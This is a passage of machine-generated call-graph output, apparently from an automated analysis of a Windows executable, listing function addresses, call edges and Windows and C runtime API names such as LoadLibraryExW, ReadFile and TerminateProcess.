103867->103855 103867->103865 103867->103881 104015 ec7667 103867->104015 104020 f22408 60 API calls 103867->104020 104021 ec9e5d 60 API calls 103867->104021 104022 ec89b3 69 API calls Mailbox 103867->104022 104023 ecb73c 340 API calls 103867->104023 104024 f164da 60 API calls 103867->104024 104025 f25244 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 103867->104025 104026 f23c55 66 API calls Mailbox 103867->104026 103868 f29e4a 89 API calls 103868->103881 103870 ec9c90 59 API calls Mailbox 103870->103881 103871 ec82df 59 API calls 103871->103881 103872 ec84c0 69 API calls 103872->103881 103873 f1617e 59 API calls Mailbox 103873->103881 103874 ec89b3 69 API calls 103874->103881 103875 f055d5 VariantClear 103875->103881 103876 ec8cd4 59 API calls Mailbox 103876->103881 103877 f0566b VariantClear 103877->103881 103878 f05419 VariantClear 103878->103881 103879 f16e8f 59 API calls 103879->103881 103880 ec7de1 59 API calls 103880->103881 103881->103813 103881->103817 103881->103819 103881->103824 103881->103825 103881->103826 103881->103827 103881->103828 103881->103829 103881->103832 103881->103833 103881->103835 103881->103837 103881->103840 103881->103858 103881->103861 103881->103862 103881->103865 103881->103867 103881->103868 103881->103870 103881->103871 103881->103872 103881->103873 103881->103874 103881->103875 103881->103876 103881->103877 103881->103878 103881->103879 103881->103880 103929 ece420 103881->103929 103936 ece6a0 103881->103936 103967 ecf460 103881->103967 103985 ec31ce IsDialogMessageW GetClassLongW 103881->103985 103992 f46018 59 API calls 103881->103992 103993 f29a15 59 API calls Mailbox 103881->103993 103994 f1d4f2 59 API calls 103881->103994 103995 ec9837 103881->103995 104013 f160ef 59 API calls 2 library calls 103881->104013 104014 ec8401 59 API calls 103881->104014 103883 efeda1 103882->103883 103884 ec82f2 103882->103884 103885 efedb1 103883->103885 105227 f161a4 59 API calls 103883->105227 103886 ec8339 Mailbox 103884->103886 103888 ec831c 103884->103888 103889 ec85c0 59 API calls 103884->103889 103886->103769 103890 ec8322 103888->103890 103891 ec85c0 59 API calls 103888->103891 103889->103888 103890->103886 103892 ec9c90 Mailbox 59 API calls 103890->103892 103891->103890 103892->103886 103893->103779 103894->103779 103897 ec9c9b 103895->103897 103896 ec9cd2 103896->103769 103897->103896 105228 ec8cd4 59 API calls Mailbox 103897->105228 103899 ec9cfd 103899->103769 103900->103710 103901->103714 103902->103719 103903->103714 103904->103714 103905->103722 103906->103732 103907->103733 103908->103733 103910 ec85ce 103909->103910 103916 ec85f6 103909->103916 103911 ec85dc 103910->103911 103912 ec85c0 59 API calls 103910->103912 103913 ec85e2 103911->103913 103914 ec85c0 59 API calls 103911->103914 103912->103911 103915 ec9c90 Mailbox 59 API calls 103913->103915 103913->103916 103914->103913 103915->103916 103916->103736 103917->103779 103918->103779 103919->103779 103920->103714 103921->103764 103922->103714 103924 ec7e62 103923->103924 103926 ec7e5f _memmove 103923->103926 103925 ee0db6 Mailbox 59 API calls 103924->103925 103925->103926 103926->103792 103927->103796 103928->103803 103930 ece43d 103929->103930 103932 ece451 103929->103932 104027 ecdf00 340 API calls 2 library calls 103930->104027 104028 f29e4a 89 API calls 4 library calls 103932->104028 103933 ece448 103933->103881 103935 f03aa4 103935->103935 103937 ece6d5 103936->103937 103938 f03aa9 103937->103938 103941 ece73f 103937->103941 103950 ece799 103937->103950 103939 ec9ea0 340 API calls 103938->103939 103940 f03abe 103939->103940 103966 ece970 Mailbox 103940->103966 104030 f29e4a 89 API calls 4 library calls 103940->104030 103944 ec7667 59 API calls 103941->103944 103941->103950 103942 ec7667 59 API calls 103942->103950 103946 f03b04 103944->103946 103945 ee2d40 __cinit 67 API calls 103945->103950 103947 ee2d40 __cinit 67 API calls 103946->103947 103947->103950 103948 f03b26 103948->103881 103949 ec84c0 69 API calls 103949->103966 103950->103942 103950->103945 103950->103948 103951 ece95a 103950->103951 103950->103966 103951->103966 104031 f29e4a 89 API calls 4 library calls 103951->104031 103953 ec8d40 59 API calls 103953->103966 103955 ec9ea0 340 API calls 103955->103966 103956 ec9c90 Mailbox 59 API calls 103956->103966 103957 f29e4a 89 API calls 103957->103966 103963 f03e25 103963->103881 103964 ecf195 104035 f29e4a 89 API calls 4 library calls 103964->104035 103965 ecea78 103965->103881 103966->103949 103966->103953 103966->103955 103966->103956 103966->103957 103966->103964 103966->103965 104029 ec7f77 59 API calls 2 library calls 103966->104029 104032 f16e8f 59 API calls 103966->104032 104033 f3c5c3 340 API calls 103966->104033 104034 f3b53c 340 API calls Mailbox 103966->104034 104036 f393c6 340 API calls Mailbox 103966->104036 103968 ecf4ba 103967->103968 103969 ecf650 103967->103969 103970 ecf4c6 103968->103970 103971 f0441e 103968->103971 103972 ec7de1 59 API calls 103969->103972 104037 ecf290 103970->104037 104138 f3bc6b 103971->104138 103978 ecf58c Mailbox 103972->103978 103975 f0442c 103979 ecf630 103975->103979 104178 f29e4a 89 API calls 4 library calls 103975->104178 103977 ecf4fd 103977->103975 103977->103978 103977->103979 104052 f2cb7a 103978->104052 104132 f3df37 103978->104132 104135 f23c37 103978->104135 103979->103881 103980 ec9c90 Mailbox 59 API calls 103981 ecf5e3 103980->103981 103981->103979 103981->103980 103985->103881 103986->103810 103987->103815 103988->103881 103989->103820 103990->103820 103991->103820 103992->103881 103993->103881 103994->103881 103996 ec984b 103995->103996 103997 ec9851 103995->103997 103996->103881 103998 eff5d3 __i64tow 103997->103998 103999 ec9899 103997->103999 104001 ec9857 __itow 103997->104001 104004 eff4da 103997->104004 105225 ee3698 83 API calls 4 library calls 103999->105225 104003 ee0db6 Mailbox 59 API calls 104001->104003 104005 ec9871 104003->104005 104006 ee0db6 Mailbox 59 API calls 104004->104006 104011 eff552 Mailbox _wcscpy 104004->104011 104005->103996 104007 ec7de1 59 API calls 104005->104007 104008 eff51f 104006->104008 104007->103996 104009 ee0db6 Mailbox 59 API calls 104008->104009 104010 eff545 104009->104010 104010->104011 104012 ec7de1 59 API calls 104010->104012 105226 ee3698 83 API calls 4 library calls 104011->105226 104012->104011 104013->103881 104014->103881 104016 ee0db6 Mailbox 59 API calls 104015->104016 104017 ec7688 104016->104017 104018 ee0db6 Mailbox 59 API calls 104017->104018 104019 ec7696 104018->104019 104019->103867 104020->103867 104021->103867 104022->103867 104023->103867 104024->103867 104025->103867 104026->103867 104027->103933 104028->103935 104029->103966 104030->103966 104031->103966 104032->103966 104033->103966 104034->103966 104035->103963 104036->103966 104038 ecf43a 104037->104038 104040 ecf2bc 104037->104040 104180 f29e4a 89 API calls 4 library calls 104038->104180 104040->104038 104048 ecf2f9 _memmove 104040->104048 104041 ecf3d3 104042 ecf3e3 104041->104042 104179 f3a2d9 85 API calls Mailbox 104041->104179 104042->103977 104044 ee0db6 59 API calls Mailbox 104044->104048 104045 f043f9 104182 ecf6a3 340 API calls 104045->104182 104046 ec9ea0 340 API calls 104046->104048 104048->104041 104048->104044 104048->104045 104048->104046 104049 f043a9 104048->104049 104050 f043ab 104048->104050 104049->103977 104181 f29e4a 89 API calls 4 library calls 104050->104181 104053 ec7667 59 API calls 104052->104053 104054 f2cbaf 104053->104054 104055 ec7667 59 API calls 104054->104055 104056 f2cbb8 104055->104056 104058 f2cbcc 104056->104058 104370 ec9b3c 59 API calls 104056->104370 104059 ec9837 84 API calls 104058->104059 104060 f2cbe9 104059->104060 104061 f2ccea 104060->104061 104062 f2cc0b 104060->104062 104131 f2cd1a Mailbox 104060->104131 104183 ec4ddd 104061->104183 104063 ec9837 84 API calls 104062->104063 104066 f2cc17 104063->104066 104068 ec8047 59 API calls 104066->104068 104067 f2cd16 104071 ec7667 59 API calls 104067->104071 104067->104131 104069 f2cc23 104068->104069 104074 f2cc37 104069->104074 104075 f2cc69 104069->104075 104070 ec4ddd 136 API calls 104070->104067 104072 f2cd4b 104071->104072 104073 ec7667 59 API calls 104072->104073 104076 f2cd54 104073->104076 104077 ec8047 59 API calls 104074->104077 104078 ec9837 84 API calls 104075->104078 104079 ec7667 59 API calls 104076->104079 104080 f2cc47 104077->104080 104081 f2cc76 104078->104081 104082 f2cd5d 104079->104082 104371 ec7cab 104080->104371 104085 ec8047 59 API calls 104081->104085 104083 ec7667 59 API calls 104082->104083 104086 f2cd66 104083->104086 104088 f2cc82 104085->104088 104090 ec9837 84 API calls 104086->104090 104378 f24a31 GetFileAttributesW 104088->104378 104093 f2cd73 104090->104093 104091 ec9837 84 API calls 104094 f2cc5d 104091->104094 104092 f2cc8b 104095 f2cc9e 104092->104095 104098 ec79f2 59 API calls 104092->104098 104207 ec459b 104093->104207 104097 ec7b2e 59 API calls 104094->104097 104100 ec9837 84 API calls 104095->104100 104106 f2cca4 104095->104106 104097->104075 104098->104095 104099 f2cd8e 104258 ec79f2 104099->104258 104102 f2cccb 104100->104102 104379 f237ef 75 API calls Mailbox 104102->104379 104105 f2cdd1 104107 ec8047 59 API calls 104105->104107 104106->104131 104109 f2cddf 104107->104109 104108 ec79f2 59 API calls 104110 f2cdae 104108->104110 104111 ec7b2e 59 API calls 104109->104111 104110->104105 104380 ec7bcc 104110->104380 104112 f2cded 104111->104112 104114 ec7b2e 59 API calls 104112->104114 104116 f2cdfb 104114->104116 104115 f2cdc3 104117 ec7bcc 59 API calls 104115->104117 104118 ec7b2e 59 API calls 104116->104118 104117->104105 104119 f2ce09 104118->104119 104120 ec9837 84 API calls 104119->104120 104121 f2ce15 104120->104121 104261 f24071 104121->104261 104123 f2ce26 104131->103981 105110 f3cadd 104132->105110 104134 f3df47 104134->103981 105213 f2445a GetFileAttributesW 104135->105213 104139 f3bcb0 104138->104139 104140 f3bc96 104138->104140 105218 f3a213 59 API calls Mailbox 104139->105218 105217 f29e4a 89 API calls 4 library calls 104140->105217 104143 f3bcbb 104144 ec9ea0 339 API calls 104143->104144 104145 f3bd1c 104144->104145 104146 f3bdae 104145->104146 104150 f3bd5d 104145->104150 104171 f3bca8 Mailbox 104145->104171 104147 f3be04 104146->104147 104148 f3bdb4 104146->104148 104149 ec9837 84 API calls 104147->104149 104147->104171 105220 f2791a 59 API calls 104148->105220 104151 f3be16 104149->104151 105219 f272df 59 API calls Mailbox 104150->105219 104153 ec7e4f 59 API calls 104151->104153 104156 f3be3a CharUpperBuffW 104153->104156 104154 f3bdd7 105221 ec5d41 59 API calls Mailbox 104154->105221 104161 f3be54 104156->104161 104158 f3bd8d 104160 ecf460 339 API calls 104158->104160 104159 f3bddf Mailbox 104165 ecfce0 339 API calls 104159->104165 104160->104171 104162 f3bea7 104161->104162 104163 f3be5b 104161->104163 104164 ec9837 84 API calls 104162->104164 105222 f272df 59 API calls Mailbox 104163->105222 104166 f3beaf 104164->104166 104165->104171 105223 ec9e5d 60 API calls 104166->105223 104169 f3be89 104170 ecf460 339 API calls 104169->104170 104170->104171 104171->103975 104172 f3beb9 104172->104171 104173 ec9837 84 API calls 104172->104173 104174 f3bed4 104173->104174 105224 ec5d41 59 API calls Mailbox 104174->105224 104176 f3bee4 104177 ecfce0 339 API calls 104176->104177 104177->104171 104178->103979 104179->104042 104180->104049 104181->104049 104182->104049 104395 ec4bb5 104183->104395 104188 ec4e08 LoadLibraryExW 104405 ec4b6a 104188->104405 104189 efd8e6 104191 ec4e4a 84 API calls 104189->104191 104193 efd8ed 104191->104193 104195 ec4b6a 3 API calls 104193->104195 104197 efd8f5 104195->104197 104196 ec4e2f 104196->104197 104198 ec4e3b 104196->104198 104431 ec4f0b 104197->104431 104200 ec4e4a 84 API calls 104198->104200 104202 ec4e40 104200->104202 104202->104067 104202->104070 104204 efd91c 104437 ec4ec7 104204->104437 104208 ec7667 59 API calls 104207->104208 104209 ec45b1 104208->104209 104210 ec7667 59 API calls 104209->104210 104211 ec45b9 104210->104211 104212 ec7667 59 API calls 104211->104212 104213 ec45c1 104212->104213 104214 ec7667 59 API calls 104213->104214 104215 ec45c9 104214->104215 104216 ec45fd 104215->104216 104217 efd4d2 104215->104217 104218 ec784b 59 API calls 104216->104218 104219 ec8047 59 API calls 104217->104219 104220 ec460b 104218->104220 104221 efd4db 104219->104221 104732 ec7d2c 104220->104732 104736 ec7d8c 104221->104736 104224 ec4615 104225 ec784b 59 API calls 104224->104225 104226 ec4640 104224->104226 104228 ec4636 104225->104228 104229 ec465f 104226->104229 104243 efd4fb 104226->104243 104244 ec4680 104226->104244 104232 ec7d2c 59 API calls 104228->104232 104230 ec79f2 59 API calls 104229->104230 104235 ec4669 104230->104235 104231 ec4691 104236 ec8047 59 API calls 104231->104236 104237 ec46a3 104231->104237 104232->104226 104233 efd5cb 104234 ec7bcc 59 API calls 104233->104234 104253 efd588 104234->104253 104240 ec784b 59 API calls 104235->104240 104235->104244 104236->104237 104238 ec46b3 104237->104238 104241 ec8047 59 API calls 104237->104241 104239 ec46ba 104238->104239 104245 ec8047 59 API calls 104238->104245 104246 ec8047 59 API calls 104239->104246 104255 ec46c1 Mailbox 104239->104255 104240->104244 104241->104238 104242 efd5b4 104242->104233 104248 efd59f 104242->104248 104243->104233 104243->104242 104251 efd532 104243->104251 104719 ec784b 104244->104719 104245->104239 104246->104255 104247 efd590 104249 ec7bcc 59 API calls 104247->104249 104250 ec7bcc 59 API calls 104248->104250 104249->104253 104250->104253 104251->104247 104256 efd57b 104251->104256 104252 ec79f2 59 API calls 104252->104253 104253->104244 104253->104252 104740 ec7924 59 API calls 2 library calls 104253->104740 104255->104099 104257 ec7bcc 59 API calls 104256->104257 104257->104253 104259 ec7e4f 59 API calls 104258->104259 104260 ec79fd 104259->104260 104260->104105 104260->104108 104262 f2408d 104261->104262 104263 f24092 104262->104263 104264 f240a0 104262->104264 104265 ec8047 59 API calls 104263->104265 104266 ec7667 59 API calls 104264->104266 104267 f2409b Mailbox 104265->104267 104268 f240a8 104266->104268 104267->104123 104269 ec7667 59 API calls 104268->104269 104370->104058 104372 ec7cbf 104371->104372 104373 efed4a 104371->104373 105104 ec7c50 104372->105104 104375 ec8029 59 API calls 104373->104375 104377 efed55 __wsetenvp _memmove 104375->104377 104376 ec7cca 104376->104091 104378->104092 104379->104106 104381 ec7bd8 __wsetenvp 104380->104381 104382 ec7c45 104380->104382 104384 ec7bee 104381->104384 104385 ec7c13 104381->104385 104383 ec7d2c 59 API calls 104382->104383 104388 ec7bf6 _memmove 104383->104388 105109 ec7f27 59 API calls Mailbox 104384->105109 104386 ec8029 59 API calls 104385->104386 104386->104388 104388->104115 104442 ec4c03 104395->104442 104398 ec4bdc 104400 ec4bec FreeLibrary 104398->104400 104401 ec4bf5 104398->104401 104399 ec4c03 2 API calls 104399->104398 104400->104401 104402 ee525b 104401->104402 104446 ee5270 104402->104446 104404 ec4dfc 104404->104188 104404->104189 104527 ec4c36 104405->104527 104407 ec4b8f 104410 ec4baa 104407->104410 104411 ec4ba1 FreeLibrary 104407->104411 104409 ec4c36 2 API calls 104409->104407 104412 ec4c70 104410->104412 104411->104410 104413 ee0db6 Mailbox 59 API calls 104412->104413 104414 ec4c85 104413->104414 104531 ec522e 104414->104531 104416 ec4c91 _memmove 104418 ec4d89 104416->104418 104419 ec4dc1 104416->104419 104422 ec4ccc 104416->104422 104417 ec4ec7 69 API calls 104428 ec4cd5 104417->104428 104534 ec4e89 CreateStreamOnHGlobal 104418->104534 104545 f2991b 95 API calls 104419->104545 104422->104417 104423 ec4f0b 74 API calls 104423->104428 104425 ec4d69 104425->104196 104426 efd8a7 104427 ec4ee5 85 API calls 104426->104427 104429 efd8bb 104427->104429 104428->104423 104428->104425 104428->104426 104540 ec4ee5 104428->104540 104430 ec4f0b 74 API calls 104429->104430 104430->104425 104432 ec4f1d 104431->104432 104433 efd9cd 104431->104433 104569 ee55e2 104432->104569 104436 f29109 GetSystemTimeAsFileTime 104436->104204 104438 ec4ed6 104437->104438 104439 efd990 104437->104439 104701 ee5c60 104438->104701 104441 ec4ede 104443 ec4bd0 104442->104443 104444 ec4c0c LoadLibraryA 104442->104444 104443->104398 104443->104399 104444->104443 104445 ec4c1d GetProcAddress 104444->104445 104445->104443 104449 ee527c __setmbcp 104446->104449 104447 ee528f 104495 ee8b28 58 API calls __getptd_noexit 104447->104495 104449->104447 104451 ee52c0 104449->104451 104450 ee5294 104496 ee8db6 9 API calls __strnicoll_l 104450->104496 104465 ef04e8 104451->104465 104454 ee52c5 104455 ee52ce 104454->104455 104456 ee52db 104454->104456 104497 ee8b28 58 API calls __getptd_noexit 104455->104497 104458 ee5305 104456->104458 104459 ee52e5 104456->104459 104480 ef0607 104458->104480 104498 ee8b28 58 API calls __getptd_noexit 104459->104498 104462 ee529f @_EH4_CallFilterFunc@8 __setmbcp 104462->104404 104466 ef04f4 __setmbcp 104465->104466 104467 ee9c0b __lock 58 API calls 104466->104467 104478 ef0502 104467->104478 104468 ef0576 104500 ef05fe 104468->104500 104469 ef057d 104505 ee881d 58 API calls 2 library calls 104469->104505 104472 ef0584 104472->104468 104506 ee9e2b InitializeCriticalSectionAndSpinCount 104472->104506 104473 ef05f3 __setmbcp 104473->104454 104475 ee9c93 __mtinitlocknum 58 API calls 104475->104478 104477 ef05aa EnterCriticalSection 104477->104468 104478->104468 104478->104469 104478->104475 104503 ee6c50 59 API calls __lock 104478->104503 104504 ee6cba LeaveCriticalSection LeaveCriticalSection _doexit 104478->104504 104489 ef0627 __wopenfile 104480->104489 104481 ef0641 104511 ee8b28 58 API calls __getptd_noexit 104481->104511 104483 ef07fc 104483->104481 104486 ef085f 104483->104486 104484 ef0646 104512 ee8db6 9 API calls __strnicoll_l 104484->104512 104508 ef85a1 104486->104508 104487 ee5310 104499 ee5332 LeaveCriticalSection LeaveCriticalSection __wfsopen 104487->104499 104489->104481 104489->104483 104489->104489 104513 ee37cb 60 API calls 3 library calls 104489->104513 104491 ef07f5 104491->104483 104514 ee37cb 60 API calls 3 library calls 104491->104514 104493 ef0814 104493->104483 104515 ee37cb 60 API calls 3 library calls 104493->104515 104495->104450 104496->104462 104497->104462 104498->104462 104499->104462 104507 ee9d75 LeaveCriticalSection 104500->104507 104502 ef0605 104502->104473 104503->104478 104504->104478 104505->104472 104506->104477 104507->104502 104516 ef7d85 104508->104516 104510 ef85ba 104510->104487 104511->104484 104512->104487 104513->104491 104514->104493 104515->104483 104517 ef7d91 __setmbcp 104516->104517 104518 ef7da7 104517->104518 104520 ef7ddd 104517->104520 104519 ee8b28 __setmbcp 58 API calls 104518->104519 104521 ef7dac 104519->104521 104522 ef7e4e __wsopen_nolock 109 API calls 104520->104522 104523 ee8db6 __strnicoll_l 9 API calls 104521->104523 104524 ef7df9 104522->104524 104526 ef7db6 __setmbcp 104523->104526 104525 ef7e22 __wsopen_helper LeaveCriticalSection 104524->104525 104525->104526 104526->104510 104528 ec4b83 104527->104528 104529 ec4c3f LoadLibraryA 104527->104529 104528->104407 104528->104409 104529->104528 104530 ec4c50 GetProcAddress 104529->104530 104530->104528 104532 ee0db6 Mailbox 59 API calls 104531->104532 104533 ec5240 104532->104533 104533->104416 104535 ec4ea3 FindResourceExW 104534->104535 104539 ec4ec0 104534->104539 104536 efd933 LoadResource 104535->104536 104535->104539 104537 efd948 SizeofResource 104536->104537 104536->104539 104538 efd95c LockResource 104537->104538 104537->104539 104538->104539 104539->104422 104541 efd9ab 104540->104541 104542 ec4ef4 104540->104542 104546 ee584d 104542->104546 104544 ec4f02 104544->104428 104545->104422 104549 ee5859 __setmbcp 104546->104549 104547 ee586b 104559 ee8b28 58 API calls __getptd_noexit 104547->104559 104549->104547 104550 ee5891 104549->104550 104561 ee6c11 104550->104561 104551 ee5870 104560 ee8db6 9 API calls __strnicoll_l 104551->104560 104556 ee58a6 104568 ee58c8 LeaveCriticalSection LeaveCriticalSection __wfsopen 104556->104568 104558 ee587b __setmbcp 104558->104544 104559->104551 104560->104558 104562 ee6c43 EnterCriticalSection 104561->104562 104563 ee6c21 104561->104563 104565 ee5897 104562->104565 104563->104562 104564 ee6c29 104563->104564 104566 ee9c0b __lock 58 API calls 104564->104566 104567 ee57be 83 API calls 5 library calls 104565->104567 104566->104565 104567->104556 104568->104558 104572 ee55fd 104569->104572 104571 ec4f2e 104571->104436 104573 ee5609 __setmbcp 104572->104573 104574 ee564c 104573->104574 104575 ee5644 __setmbcp 104573->104575 104580 ee561f _memset 104573->104580 104576 ee6c11 __lock_file 59 API calls 104574->104576 104575->104571 104577 ee5652 104576->104577 104585 ee541d 104577->104585 104599 ee8b28 58 API calls __getptd_noexit 104580->104599 104581 ee5639 104600 ee8db6 9 API calls __strnicoll_l 104581->104600 104589 ee5438 _memset 104585->104589 104591 ee5453 104585->104591 104586 ee5443 104697 ee8b28 58 API calls __getptd_noexit 104586->104697 104588 ee5448 104698 ee8db6 9 API calls __strnicoll_l 104588->104698 104589->104586 104589->104591 104596 ee5493 104589->104596 104601 ee5686 LeaveCriticalSection LeaveCriticalSection __wfsopen 104591->104601 104593 ee55a4 _memset 104700 ee8b28 58 API calls __getptd_noexit 104593->104700 104596->104591 104596->104593 104602 ee46e6 104596->104602 104609 ef0e5b 104596->104609 104677 ef0ba7 104596->104677 104699 ef0cc8 58 API calls 4 library calls 104596->104699 104599->104581 104600->104575 104601->104575 104603 ee4705 104602->104603 104604 ee46f0 104602->104604 104603->104596 104605 ee8b28 __setmbcp 58 API calls 104604->104605 104606 ee46f5 104605->104606 104607 ee8db6 __strnicoll_l 9 API calls 104606->104607 104608 ee4700 104607->104608 104608->104596 104610 ef0e7c 104609->104610 104611 ef0e93 104609->104611 104612 ee8af4 __lseeki64 58 API calls 104610->104612 104613 ef15cb 104611->104613 104618 ef0ecd 104611->104618 104614 ef0e81 104612->104614 104615 ee8af4 __lseeki64 58 API calls 104613->104615 104617 ee8b28 __setmbcp 58 API calls 104614->104617 104616 ef15d0 104615->104616 104619 ee8b28 __setmbcp 58 API calls 104616->104619 104657 ef0e88 104617->104657 104620 ef0ed5 104618->104620 104625 ef0eec 104618->104625 104621 ef0ee1 104619->104621 104622 ee8af4 __lseeki64 58 API calls 104620->104622 104624 ee8db6 __strnicoll_l 9 API calls 104621->104624 104623 ef0eda 104622->104623 104627 ee8b28 __setmbcp 58 API calls 104623->104627 104624->104657 104626 ef0f01 104625->104626 104629 ef0f1b 104625->104629 104630 ef0f39 104625->104630 104625->104657 104628 ee8af4 __lseeki64 58 API calls 104626->104628 104627->104621 104628->104623 104629->104626 104634 ef0f26 104629->104634 104631 ee881d __malloc_crt 58 API calls 104630->104631 104632 ef0f49 104631->104632 104635 ef0f6c 104632->104635 104636 ef0f51 104632->104636 104633 ef5c6b __write_nolock 58 API calls 104637 ef103a 104633->104637 104634->104633 104640 ef18c1 __lseeki64_nolock 60 API calls 104635->104640 104638 ee8b28 __setmbcp 58 API calls 104636->104638 104639 ef10b3 ReadFile 104637->104639 104644 ef1050 GetConsoleMode 104637->104644 104641 ef0f56 104638->104641 104642 ef10d5 104639->104642 104643 ef1593 GetLastError 104639->104643 104640->104634 104645 ee8af4 __lseeki64 58 API calls 104641->104645 104642->104643 104650 ef10a5 104642->104650 104646 ef1093 104643->104646 104647 ef15a0 104643->104647 104648 ef1064 104644->104648 104649 ef10b0 104644->104649 104645->104657 104655 ee8b07 __dosmaperr 58 API calls 104646->104655 104659 ef1099 104646->104659 104651 ee8b28 __setmbcp 58 API calls 104647->104651 104648->104649 104652 ef106a ReadConsoleW 104648->104652 104649->104639 104650->104659 104661 ef110a 104650->104661 104667 ef1377 104650->104667 104653 ef15a5 104651->104653 104652->104650 104654 ef108d GetLastError 104652->104654 104656 ee8af4 __lseeki64 58 API calls 104653->104656 104654->104646 104655->104659 104656->104659 104657->104596 104658 ee2d55 _free 58 API calls 104658->104657 104659->104657 104659->104658 104662 ef1176 ReadFile 104661->104662 104668 ef11f7 104661->104668 104663 ef1197 GetLastError 104662->104663 104669 ef11a1 104662->104669 104663->104669 104664 ef12b4 104673 ef18c1 __lseeki64_nolock 60 API calls 104664->104673 104674 ef1264 MultiByteToWideChar 104664->104674 104665 ef12a4 104670 ee8b28 __setmbcp 58 API calls 104665->104670 104666 ef147d ReadFile 104671 ef14a0 GetLastError 104666->104671 104672 ef14ae 104666->104672 104667->104659 104667->104666 104668->104659 104668->104664 104668->104665 104668->104674 104669->104661 104675 ef18c1 __lseeki64_nolock 60 API calls 104669->104675 104670->104659 104671->104672 104672->104667 104676 ef18c1 __lseeki64_nolock 60 API calls 104672->104676 104673->104674 104674->104654 104674->104659 104675->104669 104676->104672 104678 ef0bb2 104677->104678 104681 ef0bc7 104677->104681 104679 ee8b28 __setmbcp 58 API calls 104678->104679 104680 ef0bb7 104679->104680 104682 ee8db6 __strnicoll_l 9 API calls 104680->104682 104683 ef0bfc 104681->104683 104684 ef5fe4 __getbuf 58 API calls 104681->104684 104690 ef0bc2 104681->104690 104682->104690 104685 ee46e6 _fprintf 58 API calls 104683->104685 104684->104683 104686 ef0c10 104685->104686 104687 ef0d47 __read 72 API calls 104686->104687 104688 ef0c17 104687->104688 104689 ee46e6 _fprintf 58 API calls 104688->104689 104688->104690 104691 ef0c3a 104689->104691 104690->104596 104691->104690 104692 ee46e6 _fprintf 58 API calls 104691->104692 104693 ef0c46 104692->104693 104693->104690 104694 ee46e6 _fprintf 58 API calls 104693->104694 104695 ef0c53 104694->104695 104696 ee46e6 _fprintf 58 API calls 104695->104696 104696->104690 104697->104588 104698->104591 104699->104596 104700->104588 104702 ee5c6c __setmbcp 104701->104702 104703 ee5c7e 104702->104703 104704 ee5c93 104702->104704 104715 ee8b28 58 API calls __getptd_noexit 104703->104715 104705 ee6c11 __lock_file 59 API calls 104704->104705 104707 ee5c99 104705->104707 104717 ee58d0 67 API calls 7 library calls 104707->104717 104708 ee5c83 104716 ee8db6 9 API calls __strnicoll_l 104708->104716 104711 ee5ca4 104718 ee5cc4 LeaveCriticalSection LeaveCriticalSection __wfsopen 104711->104718 104713 ee5cb6 104714 ee5c8e __setmbcp 104713->104714 104714->104441 104715->104708 104716->104714 104717->104711 104718->104713 104720 ec785a 104719->104720 104721 ec78b7 104719->104721 104720->104721 104723 ec7865 104720->104723 104722 ec7d2c 59 API calls 104721->104722 104724 ec7888 _memmove 104722->104724 104725 efeb09 104723->104725 104726 ec7880 104723->104726 104724->104231 104727 ec8029 59 API calls 104725->104727 104741 ec7f27 59 API calls Mailbox 104726->104741 104729 efeb13 104727->104729 104730 ee0db6 Mailbox 59 API calls 104729->104730 104731 efeb33 104730->104731 104733 ec7d3a 104732->104733 104735 ec7d43 _memmove 104732->104735 104734 ec7e4f 59 API calls 104733->104734 104733->104735 104734->104735 104735->104224 104737 ec7da6 104736->104737 104739 ec7d99 104736->104739 104738 ee0db6 Mailbox 59 API calls 104737->104738 104738->104739 104739->104226 104740->104253 104741->104724 105105 ec7c5f __wsetenvp 105104->105105 105106 ec8029 59 API calls 105105->105106 105107 ec7c70 _memmove 105105->105107 105108 efed07 _memmove 105106->105108 105107->104376 105109->104388 105111 ec9837 84 API calls 105110->105111 105112 f3cb1a 105111->105112 105113 f3cb61 Mailbox 105112->105113 105146 f3d7a5 105112->105146 105113->104134 105115 f3cf2e 105191 f3d8c8 92 API calls Mailbox 105115->105191 105118 f3cf3d 105119 f3cdc7 105118->105119 105121 f3cf49 105118->105121 105159 f3c96e 105119->105159 105120 ec9837 84 API calls 105136 f3cbb2 Mailbox 105120->105136 105121->105113 105126 f3ce00 105127 f3ce33 105126->105127 105128 f3ce1a 105126->105128 105177 ec92ce 105127->105177 105176 f29e4a 89 API calls 4 library calls 105128->105176 105132 f3ce25 GetCurrentProcess TerminateProcess 105132->105127 105133 f3cdb9 105133->105115 105133->105119 105136->105113 105136->105120 105136->105133 105174 f3fbce 59 API calls 2 library calls 105136->105174 105175 f3cfdf 61 API calls 2 library calls 105136->105175 105138 f3cfa4 105138->105113 105142 f3cfb8 FreeLibrary 105138->105142 105139 f3ce6b 105189 f3d649 107 API calls _free 105139->105189 105142->105113 105144 f3ce7c 105144->105138 105145 ec9d3c 60 API calls 105144->105145 105190 ec8d40 59 API calls Mailbox 105144->105190 105192 f3d649 107 API calls _free 105144->105192 105145->105144 105147 ec7e4f 59 API calls 105146->105147 105148 f3d7c0 CharLowerBuffW 105147->105148 105193 f1f167 105148->105193 105152 ec7667 59 API calls 105153 f3d7f9 105152->105153 105154 ec784b 59 API calls 105153->105154 105155 f3d810 105154->105155 105156 ec7d2c 59 API calls 105155->105156 105157 f3d81c Mailbox 105156->105157 105158 f3d858 Mailbox 105157->105158 105200 f3cfdf 61 API calls 2 library calls 105157->105200 105158->105136 105160 f3c9de 105159->105160 105161 f3c989 105159->105161 105165 f3da50 105160->105165 105162 ee0db6 Mailbox 59 API calls 105161->105162 105164 f3c9ab 105162->105164 105163 ee0db6 Mailbox 59 API calls 105163->105164 105164->105160 105164->105163 105166 f3dc79 Mailbox 105165->105166 105173 f3da73 _strcat _wcscpy __wsetenvp 105165->105173 105166->105126 105167 ec9be6 59 API calls 105167->105173 105168 ec9b3c 59 API calls 105168->105173 105169 ec9b98 59 API calls 105169->105173 105170 ec9837 84 API calls 105170->105173 105171 ee571c 58 API calls _W_store_winword 105171->105173 105173->105166 105173->105167 105173->105168 105173->105169 105173->105170 105173->105171 105203 f25887 61 API calls 2 library calls 105173->105203 105174->105136 105175->105136 105176->105132 105178 ec92d6 105177->105178 105179 ee0db6 Mailbox 59 API calls 105178->105179 105180 ec92e4 105179->105180 105182 ec92f0 105180->105182 105204 ec91fc 59 API calls Mailbox 105180->105204 105183 ec9050 105182->105183 105205 ec9160 105183->105205 105185 ec905f 105186 ee0db6 Mailbox 59 API calls 105185->105186 105187 ec90fb 105185->105187 105186->105187 105187->105144 105188 ec8d40 59 API calls Mailbox 105187->105188 105188->105139 105189->105144 105190->105144 105191->105118 105192->105144 105195 f1f192 __wsetenvp 105193->105195 105194 f1f1d1 105194->105152 105194->105157 105195->105194 